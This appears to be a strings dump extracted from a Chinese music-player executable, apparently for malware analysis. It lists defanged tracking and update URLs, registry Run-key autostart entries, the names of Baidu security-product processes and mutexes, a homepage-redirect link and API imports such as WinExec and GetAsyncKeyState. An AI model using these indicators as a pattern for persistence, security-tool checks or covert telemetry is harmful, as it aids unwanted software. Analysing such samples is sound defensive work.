\HotPlugins.xml

\HotPlugin.bnr

PluginSetup.xml

explorer.exe

winlogon.exe

SOFTWARE\Microsoft\Windows\CurrentVersion

ntdll.dll

BaiduAnTray.exe

"{0}\{1}" {2}

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

EXPLORER.EXE

BaiduAn.exe

BaiduAnUpdate.exe

BaiduAnBugRpt.exe

Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}

BDAFileHelper.exe

Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}

BDALeakfixer.exe

Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}

\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}

BDASoftmgr.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn

\RTPPlugins\RtpContainerConfig.xml

C:\test.exe

d-d-d d:d:d d

d:d:d

%s(%d)

Last Error : %u(%s)

Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

BDMNet.dll

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

BDMUpdate.dll

.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

kernel32.dll

\Global.db

Diphlpapi.dll

D\\.\PhysicalDrive%d

\\.\Scsi%d:

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

2.3.0.2224

BaiduanSvc.exe

yymusic05.exe_2308:

.text

`.rdata

@.data

.rsrc

@.reloc

u.jAh

t.HuZ

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C   CRT: Not enough memory to complete call to strerror.

GetProcessWindowStation

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

windows936

windows932

windows874

windows1257

windows1256

windows1255

windows1254

windows1253

windows1252

windows1251

windows1250

Invalid or unsupported charset:

%sData\user2.ini

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}

Unins.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

hXXp://update.bianya.cc/stj.ashx

AutoRunTipFrame.xml

FrmColor.xml

\SysConfig.ini

FrmConfig.xml

Data\dh.ini

ShowHideWindowKey

ExitWindowKey

tab_hotkey

Software\Microsoft\Windows\CurrentVersion\Run

BoxNews.exe

"%s%s" -mini

"%s" -mini

%s\%s

favorfm.xml

channels.xml

E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/ptree_implementation.hpp

E:\zhuyicheng\boost_1_53_0\boost/property_tree/xml_parser.hpp

E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_read_rapidxml.hpp

E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_write.hpp

E:\zhuyicheng\boost_1_53_0\boost/property_tree/string_path.hpp

FrmFeedBack.xml

hXXp://tongji.yinyue.fm/feedback/b.html

Data/setup.ini

FrmHotKeyTip.xml

HotKeyTipFrame

hotkey

d:d:d

FrmLrcChild.xml

FrmLrc.xml

Source Files\LrcFrame.cpp

BtnLogin

yymusic05.exe

hXXp://VVV.hao123.com/?tn=98868055_hao_pg

hXXp://update.yinyue.fm/goUrl.html?

Skin.rs

Skin\mainframeshadow.png

hXXp://update.yinyue.fm/tj.ashx

Skin\progresstooltip.png

__HotKeyTipWindow

__HotKeyTipClass

Skin\hotkeytipbk.png

adb.exe

aapt.exe

apnews.exe

FrmPlayer.xml

60,8,100,118

60,24,100,134

Source Files\MainFrame.cpp

file='suspensiontopa.png'

file='suspensiontop.png'

file='suspensiontopahover.png'

file='btn-play.png' source='0,0,64,64'

file='btn-play.png' source='0,64,64,128'

file='btn-play.png' source='0,128,64,192'

file='lyrictoplay.png'

pl_play.png

file='btn-pause.png' source='0,0,64,64'

file='btn-pause.png' source='0,64,64,128'

file='btn-pause.png' source='0,128,64,192'

file='play0520.png' source='0,0,35,20'

file='play0520.png' source='0,20,35,40'

file='play0520.png' source='0,40,35,59'

pl_pause.png

file='loading0%d.png'

-d:d:d

-d:d

file='play0520.png' source='0,0,35,20'

file='play0520.png' source='0,20,35,40'

file='play0520.png' source='0,40,35,59'

file='bk.png'

lyriclikea2.png

lyriclike.png

lyriclikea.png

MessageBox.xml

Source Files\MusicPlayer.cpp

hXXp://update.yinyue.fm/

<4,$?7/'

(3-!0,1'8"5.*2$

Data\server.ini

Data\Version.ini

appupdate/ver.txt

PlayerUpdate.exe

FrmPlayList.xml

FrmPopWnd.xml

WebBrowserEx

hXXp://update.yinyue.fm/url.txt

FrmProgressToolTip.xml

%d:d

hXXp://tongji.yinyue.fm/

a.ashx

00:00:00:00:00:00

%d-%d-%d %d:%d:%d

icon/ccjs.ico

icon/ie.ico

Internet Explorer YyfmPlay.lnk

icon\gouwu.ico

hXXp://update.yinyue.fm//dh.txt

icon\ccjs.ico

icon\ie.ico

X:X:X:X:X:X

//./%s

Data/version.ini

2000-01-01

2000-01-01 00:00:00

Data/client.ini

Data/dh.ini

Software\Microsoft\Windows NT\CurrentVersion

Data/user2.ini

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe

\TheWorld.ini

\Baidu\browser\config.ini

\SogouExplorer\config.xml

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Maxthon2

SharedAccount\Config\Config.ini

SetTipFrame.xml

FrmSetWindowLrcFrame.xml

Source Files\SetWindowLrcFrame.cpp

FrmSystemMenuFrame.xml

event_edit_keydown_eshowhide

event_edit_keydown_eexit

file='list_play.png' dest='6,6,24,24'

file='list_pause.png' dest='6,6,24,24'

<i arrow_2.png>

<i arrow_1.png>

2-0-0|1-0-0

1-0-0|1-0-0

3-0-0|1-0-0

4-0-0|1-0-0

5-0-0|1-0-0

6-0-0|1-0-0

list_item.xml

operation

frmWindowLrc.xml

frmWindowLrcParent.xml

hXXp://VVV.9ku.com/lrc2/

hXXp://VVV.9ku.com/fm/

hXXp://img.9ku.com

hXXp://mp3.9ku.com

E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/json_parser_read.hpp

hXXp://player.kuwo.cn/webmusic/st/getMuiseDate?flag=3&r=&pd=

hXXp://fm.baidu.com/dev/api/?tn=playlist&id=

hXXp://music.baidu.com/data/music/fmlink?type=mp3&rate=320&songIds=

hXXp://fm.baidu.com

hXXp://pan.baidu.com

hXXp://live.hkuradio.com/radio2?download=1

hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_yy.png

hXXp://live.hkuradio.com/radio1?download=1

hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_zh.png

hXXp://live.3gv.ifeng.com/live/zhongwen?fmt=mp3_32k_mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zwt_new.png

hXXp://live.3gv.ifeng.com/live/zixun?fmt=mp3_32k_mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zxt_new.png

hXXp://live.3gv.ifeng.com/live/hongkong?fmt=mp3_32k_mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_xgt_new.png

hXXp://moblive.rbc.cn/fm876.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_wy_new.png

hXXp://moblive.rbc.cn/fm1039.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgjt_new.png

hXXp://moblive.rbc.cn/fm1006.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_xw_new.png

hXXp://moblive.rbc.cn/am603.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bggs_new.png

hXXp://moblive.rbc.cn/fm1025.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgty_new.png

hXXp://moblive.rbc.cn/am774.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgwy_new.png

hXXp://moblive.rbc.cn/am927.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgaj_new.png

hXXp://moblive.rbc.cn/fm1073.mp3

hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgcsfw_new.png

hXXp://VVV.xiami.com/radio/play/type/6/oid/0

libfm::fm_douban_impl::login

hXXp://VVV.douban.com/j/app/login

&password=

hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=

hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=

hXXp://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=

"msg":

_0.jpg

hXXp://imgcache.qq.com/music/photo/album/

hXXp://music.qq.com/miniportal/static/lyric/

libfm::fm_impl::get_song_url

libfm::fm_impl::login

WinExec

KERNEL32.dll

GetAsyncKeyState

RegisterHotKey

UnregisterHotKey

USER32.dll

GDI32.dll

RegDeleteKeyA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyA

RegCloseKey

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

avcore.dll

HttpQueryInfoA

InternetOpenUrlA

WININET.dll

SHLWAPI.dll

gdiplus.dll

?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z

?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ

?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z

?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z

?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z

?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z

?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z

?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z

?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z

?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z

?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z

?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z

?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z

?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z

?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z

?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z

?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z

?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z

?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ

?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ

?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z

?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z

?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z

?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z

?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z

?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z

?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z

?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z

?Release@CWebBrowserUI@DuiLib@@UAGKXZ

?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ

?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z

?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ

??1CWebBrowserUI@DuiLib@@UAE@XZ

??0CWebBrowserUI@DuiLib@@QAE@XZ

?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z

?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ

?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z

DuiLib.dll

PSAPI.DLL

IPHLPAPI.DLL

NETAPI32.dll

GetCPInfo

GetProcessHeap

zcÁ

.?AVCWebBrowserUI@DuiLib@@

.?AVCHotKeyTipFrameWnd@@

.?AVCWebBrowserUIEx@@

.?AVWebBrowserEventSinker@@

.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@D@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$alternative@V?$action@U?$difference@U?$difference@Uanychar_parser@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@Ua_char@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$positive@U?$contiguous@U?$confix_parser@U?$chlit@D@classic@spirit@boost@@U?$kleene_star@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@U1234@Uunary_parser_category@234@Unon_nested@234@Unon_lexeme@234@@classic@spirit@boost@@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@D@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@D@classic@spirit@boost@@U?$optional@V?$chset@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@Ua_name@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$chlit@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

